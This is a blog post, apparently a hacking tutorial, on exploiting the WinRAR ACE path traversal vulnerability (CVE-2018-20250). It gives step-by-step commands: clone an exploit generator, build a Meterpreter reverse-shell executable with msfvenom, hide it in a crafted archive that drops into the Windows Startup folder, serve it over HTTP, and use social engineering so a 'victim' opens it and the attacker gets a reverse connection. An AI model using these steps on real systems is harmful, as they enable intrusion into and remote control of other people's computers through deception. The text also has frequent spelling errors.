Code Execution from WinRAR

at 8:12 AM Friday, May 3, 2019

In this post WinRAR has patched a serious security faults last month, one of the world's most popular Windows file compression applications, which can only be exploited by tricking a WinRar user to extract maliceous archives. The vulnerability identified last year by research.checkpoint.com affects all versions released in all WinRAR over the past 19 years.

More About Evil Winarar
CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253
Pacted Version: WinRAR 5.70 Beta 1
This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR. The winrar uses the ACE format to compress the folder and unpack the compressed folder with the help of UNACE.DLL.
In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path. This happence due improper compilation when unace.dll come into face.
Let's download a python script that will generate a malicious file archive in a rar format. Once you download the python script, install the dependency required for it.

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt



Further you need to give full permission to the python script inside the Evil-Winrar-Gen folder and then generate a malicious exe file with the help of msfvenom and name as “winrar.exe” as shown and multi handler inside metasploit.
chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe


Now create a text file that will display to the victim when he extracts the rar file to confuse him. Then execute evilWinrar python script along with malicious exe file and text file, creating a malicious archive that you can send to the target.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080

As said, this vulnerability allows us to extract the malicious file in the arbitrary path, with the help of this script we will allow rar files extraction in the /startup program. Now use social engineering for transferring the malicious rar to the victim and wait for victim to restart his machine to obtain reverse connection of the target.


There is currently no startup program in the target machine as shown below. Once the victim extracts the malicious rar file "evil.rar," our winrar.exe backdoor will extract from the startup program.



To ensure for winrar.exe file in startup folder, type shell:startup in the run prompt.

As soon as the victim will restart the machine, you will get reverse connection as shown.

Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)